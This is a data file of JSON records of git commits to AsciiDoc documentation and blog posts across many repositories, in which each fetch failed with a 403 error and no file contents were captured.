{"commit":"91a3d4c5a13098cd7c89877171d0579d90606b34","subject":"Update 2017-07-18-Who-We-Are.adoc","message":"Update 2017-07-18-Who-We-Are.adoc","repos":"Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog","old_file":"_posts\/2017-07-18-Who-We-Are.adoc","new_file":"_posts\/2017-07-18-Who-We-Are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Asastry1\/inflect-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"456f25bb21049ce00d9a2612531a70aa31ce7a68","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a5a7d1f4111bc611e876d2fa1d379b08277dfd20","subject":"Update 2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","message":"Update 2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","new_file":"_posts\/2016-11-25-Lets-programming-offline-to-gather-quality-and-knowledge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c88d02107c82b0bf377286d237e939c96fb1a079","subject":"CAMEL-11156 - added Deployments component doc","message":"CAMEL-11156 - added Deployments component 
doc\n","repos":"adessaigne\/camel,CodeSmell\/camel,apache\/camel,jonmcewen\/camel,isavin\/camel,kevinearls\/camel,objectiser\/camel,anton-k11\/camel,jamesnetherton\/camel,tadayosi\/camel,pmoerenhout\/camel,ullgren\/camel,isavin\/camel,onders86\/camel,akhettar\/camel,christophd\/camel,onders86\/camel,tdiesler\/camel,dmvolod\/camel,jamesnetherton\/camel,tadayosi\/camel,pax95\/camel,davidkarlsen\/camel,pmoerenhout\/camel,pkletsko\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,sverkera\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,cunningt\/camel,pax95\/camel,kevinearls\/camel,christophd\/camel,DariusX\/camel,rmarting\/camel,pkletsko\/camel,jonmcewen\/camel,ullgren\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,sverkera\/camel,sverkera\/camel,gautric\/camel,anton-k11\/camel,drsquidop\/camel,mcollovati\/camel,mgyongyosi\/camel,anoordover\/camel,onders86\/camel,isavin\/camel,tdiesler\/camel,mgyongyosi\/camel,Fabryprog\/camel,cunningt\/camel,pax95\/camel,pkletsko\/camel,kevinearls\/camel,Thopap\/camel,christophd\/camel,gnodet\/camel,akhettar\/camel,CodeSmell\/camel,DariusX\/camel,drsquidop\/camel,sverkera\/camel,rmarting\/camel,apache\/camel,rmarting\/camel,CodeSmell\/camel,Thopap\/camel,anton-k11\/camel,isavin\/camel,Fabryprog\/camel,Fabryprog\/camel,curso007\/camel,mcollovati\/camel,pmoerenhout\/camel,ullgren\/camel,isavin\/camel,gnodet\/camel,Fabryprog\/camel,tadayosi\/camel,anoordover\/camel,mgyongyosi\/camel,anoordover\/camel,davidkarlsen\/camel,apache\/camel,nicolaferraro\/camel,kevinearls\/camel,drsquidop\/camel,nicolaferraro\/camel,pax95\/camel,anton-k11\/camel,Thopap\/camel,anton-k11\/camel,pkletsko\/camel,adessaigne\/camel,pkletsko\/camel,nicolaferraro\/camel,mgyongyosi\/camel,objectiser\/camel,alvinkwekel\/camel,jonmcewen\/camel,mgyongyosi\/camel,cunningt\/camel,dmvolod\/camel,objectiser\/camel,snurmine\/camel,tadayosi\/camel,curso007\/camel,gnodet\/camel,onders86\/camel,salikjan\/camel,dmvolod\/camel,mcollovati\/camel,snurmine\/camel,ullgren\/camel,snurmine\/camel,gautric\/camel,zregvart\/camel,zregvart\/camel,akhettar\/camel,davidkarlsen\/camel,drsquidop\/camel,DariusX\/camel,anoordover\/camel,mgyongyosi\/camel,isavin\/camel,anton-k11\/camel,sverkera\/camel,nikhilvibhav\/camel,tdiesler\/camel,kevinearls\/camel,punkhorn\/camel-upstream,tadayosi\/camel,jamesnetherton\/camel,onders86\/camel,curso007\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,christophd\/camel,sverkera\/camel,Thopap\/camel,dmvolod\/camel,zregvart\/camel,dmvolod\/camel,apache\/camel,adessaigne\/camel,jamesnetherton\/camel,akhettar\/camel,curso007\/camel,pax95\/camel,curso007\/camel,rmarting\/camel,akhettar\/camel,apache\/camel,gautric\/camel,pmoerenhout\/camel,davidkarlsen\/camel,mcollovati\/camel,rmarting\/camel,rmarting\/camel,curso007\/camel,adessaigne\/camel,pax95\/camel,pkletsko\/camel,apache\/camel,zregvart\/camel,objectiser\/camel,CodeSmell\/camel,gnodet\/camel,pmoerenhout\/camel,jamesnetherton\/camel,anoordover\/camel,gautric\/camel,jonmcewen\/camel,onders86\/camel,anoordover\/camel,nikhilvibhav\/camel,Thopap\/camel,nikhilvibhav\/camel,cunningt\/camel,snurmine\/camel,cunningt\/camel,alvinkwekel\/camel,gautric\/camel,tadayosi\/camel,drsquidop\/camel,DariusX\/camel,snurmine\/camel,snurmine\/camel,Thopap\/camel,jonmcewen\/camel,tdiesler\/camel,gautric\/camel,christophd\/camel,punkhorn\/camel-upstream,gnodet\/camel,adessaigne\/camel,cunningt\/camel,akhettar\/camel,jonmcewen\/camel,jamesnetherton\/camel,adessaigne\/camel,salikjan\/camel,dmvolod\/camel,drsquidop\/camel,kevinearl
s\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-deployments-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-deployments-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6ab0f7730a8a660157f75eb9010887c5d7b28ca","subject":"y2b create post 3 Cool Tech Deals - #3","message":"y2b create post 3 Cool Tech Deals - #3","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-24-3-Cool-Tech-Deals--3.adoc","new_file":"_posts\/2015-06-24-3-Cool-Tech-Deals--3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0dba8908f611c1844a2c3238d0e9e1bbd7ff635","subject":"Update 2016-10-14-A-escolha-de-um-blog.adoc","message":"Update 2016-10-14-A-escolha-de-um-blog.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-14-A-escolha-de-um-blog.adoc","new_file":"_posts\/2016-10-14-A-escolha-de-um-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ba2c80fb913eb2d71b4607e8035dcf4a8b868ca","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46044e1e7edb64f06632573a878298fc59ea878d","subject":"Improve documentation format with other small fixes.","message":"Improve documentation format with other small fixes.\n","repos":"tcsavage\/cats,funcool\/cats","old_file":"doc\/content.adoc","new_file":"doc\/content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcsavage\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"bb78686b47cabc95e964268ba014cbf5cc3ae177","subject":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","message":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2df1f81b80cc18c206083e4d7ea1fbf8e71f64a5","subject":"checked out in windows","message":"checked out in windows\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/milestones\/milestone_3\/plugins_involucrados\/Agregado de Usuarios | Wallet Contacts | Actor Intra User | Intra User Network Service.asciidoc","new_file":"fermat-documentation\/milestones\/milestone_3\/plugins_involucrados\/Agregado de Usuarios | Wallet Contacts | Actor Intra User | Intra User Network Service.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10a00f468b4defa30185b72857d6f42a5240fefa","subject":"Update 2016-02-18-XML-Prague-2016-Review.adoc","message":"Update 2016-02-18-XML-Prague-2016-Review.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_file":"_posts\/2016-02-18-XML-Prague-2016-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97e06380339d6ae7223d9eab4ed569bd376ee43","subject":"testing docs","message":"testing docs\n","repos":"untangled-web\/untangled-client","old_file":"docs\/sample.adoc","new_file":"docs\/sample.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/untangled-web\/untangled-client.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06afa8f04a8df5563935344a8127ff6a2cd60f8c","subject":"docs: workflow for backing up or restoring an entire node","message":"docs: workflow for backing up or restoring an entire node\n\nI explicitly chose to be vague and not provide example shell commands\nbecause this is such a niche workflow.\n\nChange-Id: I638f4b169282d6688dec414eabfe4c81d0a3f5df\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10223\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"dd5f42564392288321a98befd08f4d61332289e6","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bb83538bb53e7a97557fac710c134818caf6cf7","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3150fed9cd3b92d83f557146dcb2c30c949b55b4","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51f5a547090d5c05c79b90ba9cd44475492086f3","subject":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","message":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a05ff64770c98b6fb75638c07af9723a9d3ad783","subject":"Update 2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5041d0c6b17a5d5878f2ac093a00906cd08cda10","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 
2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddd9fe19e9337461c3d3e62845b9c0599b4e32cf","subject":"Start of a document to record useful debugging incantations","message":"Start of a document to record useful debugging incantations\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp","old_file":"docs\/debugging-tips.adoc","new_file":"docs\/debugging-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"04e49c177e3adfa697d20a220405e9cc95e7b566","subject":"Adds the EXISTS CIP","message":"Adds the EXISTS CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2015-05-13-EXISTS.adoc","new_file":"cip\/1.accepted\/CIP2015-05-13-EXISTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6abd2f9dc0a0922d5039776c4bcaa915d0ad2add","subject":"Added document with single node software versions","message":"Added document with single node software versions\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/single_node_sw.adoc","new_file":"docs\/single_node_sw.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e468208e89a3b4b59cb2d6d3f2e4569556feb5cb","subject":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","message":"Update 2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_file":"_posts\/2016-07-24-Forma-rapida-para-identificar-seu-IP-publico-via-terminal-Linux-BSD-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec40fd62c893a9d1e7ab60bfcccefb2191f4a893","subject":"Create fr\/le_langage.adoc","message":"Create fr\/le_langage.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/le_langage.adoc","new_file":"fr\/le_langage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"960276a07f5ef743852a36ed196dfc11412930ab","subject":"Update 2018-11-13-Nuxtjs.adoc","message":"Update 2018-11-13-Nuxtjs.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_file":"_posts\/2018-11-13-Nuxtjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c81d0aa395b1785f7743f6ae4f28cd6199652171","subject":"Update 2016-11-13-Graphs.adoc","message":"Update 2016-11-13-Graphs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-13-Graphs.adoc","new_file":"_posts\/2016-11-13-Graphs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc292ddc81b28e0e80e1115b16f28057efeaae71","subject":"Update 2017-07-05-Curves.adoc","message":"Update 2017-07-05-Curves.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-05-Curves.adoc","new_file":"_posts\/2017-07-05-Curves.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b4cfe71922fbe99aaf4ae2aaa0b9928444d864b","subject":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"2100-1-1-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7608544def4610aae9d9658a6d6cfdb4d904071c","subject":"Update 2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","message":"Update 2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","new_file":"_posts\/2013-05-07-Globally-parsing-JSON-error-responses-with-jQueryajax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff6dfdf23caee19940934c2c2d3cb789e651ce03","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 
2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8de013e89240d49157d61d483872ad5fdbcf7937","subject":"Update 2017-01-10-Resume.adoc","message":"Update 2017-01-10-Resume.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2017-01-10-Resume.adoc","new_file":"_posts\/2017-01-10-Resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"600436d3266dcfab56eb2aebf2643a0a638d11b4","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7037542286a524f35861f116593a68addfa9cca6","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab3363ba9ecd228bcdd62e3d663f416eb71a370d","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"209fb3f734e5e0abe291635b5fb20377dc9d5c53","subject":"Update 2018-02-26-newton-method.adoc","message":"Update 
2018-02-26-newton-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-newton-method.adoc","new_file":"_posts\/2018-02-26-newton-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2106b7e1ae629bc5b1370b5f72ee1e3346b1235c","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-mock","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-mock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"623ca6b1fbb128343187276a87470d80e17a081e","subject":"Add contributing document","message":"Add contributing document\n","repos":"spring-projects\/spring-social-twitter,spring-projects\/spring-social-twitter,hudsonmendes\/spring-social-twitter,hudsonmendes\/spring-social-twitter","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-social-twitter.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30c24e4c83db122281466318877f6e736fac60a9","subject":"Add a CONTRIBUTING page to the repository","message":"Add a CONTRIBUTING page to the repository\n\nThis enables a link to appear in the GitHub UI when creating an issue\nor a pull request linking to this 